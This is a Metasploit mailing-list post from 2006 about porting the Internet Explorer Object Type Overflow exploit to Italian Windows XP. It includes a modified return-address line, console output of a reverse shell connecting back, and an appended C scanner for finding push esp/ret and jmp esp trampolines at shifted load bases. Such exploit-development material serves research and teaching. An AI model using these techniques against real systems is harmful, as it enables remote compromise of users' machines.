Metasploit mailing list archives
Internet Explorer Object Type Overflow
From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Wed, 31 May 2006 11:17:33 +0200
Hello,

first of all I have to say I'm not a real expert in the Windows world. While trying to exploit Internet Explorer Object Type Overflow on a host running Windows XP Professional SP1 through Metasploit, I realized that the ws2_32 push esp/ret (which is located at 0x71ab1d54 for the English version) is located at 0x71a31d54 for the Italian version, thus I modified the ie_objecttype.pm this way:

    "Windows XP" => [ 0x71a31d54, 0x7ffdec50 ], # ws2_32 push esp/ret SP0/1

When I tried to exploit the vulnerable host I saw IE crashing and on the attacker's side this behavior...

    msf ie_objecttype(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://192.168.33.162:8080 ...
    [*] HTTP Client connected from 192.168.33.107:1392 using Windows XP, sending payload...
    [*] Got connection from 192.168.33.162:4321 <-> 192.168.33.107:1393
    [*] Exiting Reverse Handler.

I tried attaching iexplore.exe with ollydbg and observed an access violation when writing to the address 0x77e40000 (this address is in ECX and EBX when the access violation is triggered). I suppose I'll need to modify even the second address in the target array in order to exit in a clean way, but I'm really not skilled in the Windows world and so hints about how to do it are really welcome.

Regards,

--
Angelo Dell'Aera 'buffer'
Antifork Research, Inc.   http://buffer.antifork.org
Metro Olografix
PGP information in e-mail header
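The locale problem in the message above (the same ws2_32 push esp/ret gadget sitting at 0x71ab1d54 on an English XP and 0x71a31d54 on an Italian one) is the usual reason a hard-coded return address fails: the two addresses differ only in their high bits, which is consistent with the same RVA 0x1d54 in a DLL loaded at a different base, and that is the assumption the example below is built on. What follows is an added example, not code from this thread or from Metasploit: a small C scanner that walks a module image as mapped at a given base, reports the virtual address of every push esp/ret (54 C3), jmp esp (FF E4) and call esp (FF D4) trampoline, and flags addresses that contain a NUL, CR or LF byte, which a string-based overflow cannot deliver. The module image is a constructed stand-in (NOP filler with a gadget planted at RVA 0x1d54 and another at RVA 0x2000), not real ws2_32.dll bytes, and the two load bases 0x71ab0000 and 0x71a30000 are assumed from the addresses quoted in the post.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Opcode patterns for the stack-pivot trampolines an exploit such as
 * ie_objecttype overwrites EIP with.  push esp / ret is 54 C3. */
struct gadget {
    const char    *name;
    const uint8_t *bytes;
    size_t         len;
};

static const uint8_t PUSH_ESP_RET[] = { 0x54, 0xC3 };
static const uint8_t JMP_ESP[]      = { 0xFF, 0xE4 };
static const uint8_t CALL_ESP[]     = { 0xFF, 0xD4 };

static const struct gadget GADGETS[] = {
    { "push esp / ret", PUSH_ESP_RET, sizeof PUSH_ESP_RET },
    { "jmp esp",        JMP_ESP,      sizeof JMP_ESP      },
    { "call esp",       CALL_ESP,     sizeof CALL_ESP     },
};

/* A 32-bit VA containing a byte the overflow cannot carry (NUL, LF, CR)
 * is unusable as a return address; report it so the caller can skip it. */
int has_bad_byte(uint32_t va) {
    for (int i = 0; i < 4; i++) {
        uint8_t b = (uint8_t)(va >> (8 * i));
        if (b == 0x00 || b == 0x0a || b == 0x0d)
            return 1;
    }
    return 0;
}

/* Scan `image` (`len` bytes of a module as mapped in memory at `base`)
 * for every gadget pattern.  Each hit's VA is stored in `out` (up to
 * `max` entries); the return value is the total number of hits found,
 * so the caller can tell when `out` was too small. */
size_t find_trampolines(const uint8_t *image, size_t len, uint32_t base,
                        uint32_t *out, size_t max) {
    size_t hits = 0;
    for (size_t off = 0; off < len; off++) {
        for (size_t g = 0; g < sizeof GADGETS / sizeof GADGETS[0]; g++) {
            const struct gadget *gd = &GADGETS[g];
            if (off + gd->len > len)
                continue;
            if (memcmp(image + off, gd->bytes, gd->len) != 0)
                continue;
            uint32_t va = base + (uint32_t)off;   /* RVA -> VA for this load base */
            if (hits < max)
                out[hits] = va;
            hits++;
            printf("0x%08x  %-15s%s\n", va, gd->name,
                   has_bad_byte(va) ? "  (contains bad byte)" : "");
        }
    }
    return hits;
}

/* Constructed stand-in for a module image (assumption: NOT real ws2_32.dll
 * bytes): NOP filler with push esp/ret at RVA 0x1d54 and jmp esp at RVA 0x2000. */
#define FAKE_LEN 0x3000
static uint8_t fake_image[FAKE_LEN];

const uint8_t *build_fake_image(void) {
    memset(fake_image, 0x90, FAKE_LEN);
    fake_image[0x1d54] = 0x54; fake_image[0x1d55] = 0xC3;   /* push esp ; ret */
    fake_image[0x2000] = 0xFF; fake_image[0x2001] = 0xE4;   /* jmp esp        */
    return fake_image;
}

int main(void) {
    uint32_t found[16];
    const uint8_t *img = build_fake_image();

    /* Same image, two load bases: the RVA is identical, only the VA moves. */
    puts("-- base 0x71ab0000 (assumed from the English address in the post) --");
    find_trampolines(img, FAKE_LEN, 0x71ab0000, found, 16);
    puts("-- base 0x71a30000 (assumed from the Italian address in the post) --");
    find_trampolines(img, FAKE_LEN, 0x71a30000, found, 16);
    return 0;
}
```

Against a real target you would feed the scanner the DLL as actually mapped in the process (the load base read from the debugger or the module list), since the preferred base in the PE header is what shifts between language builds and patch levels; the jmp esp hit at RVA 0x2000 is reported but flagged, because its VA ends in a NUL byte at either base. The scanner only tells you where a trampoline lives; it says nothing about the second value in the target array, which is a separate question from the one this example answers.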
Current thread:
- Internet Explorer Object Type Overflow Angelo Dell'Aera (May 31)
- Internet Explorer Object Type Overflow Jerome Athias (May 31)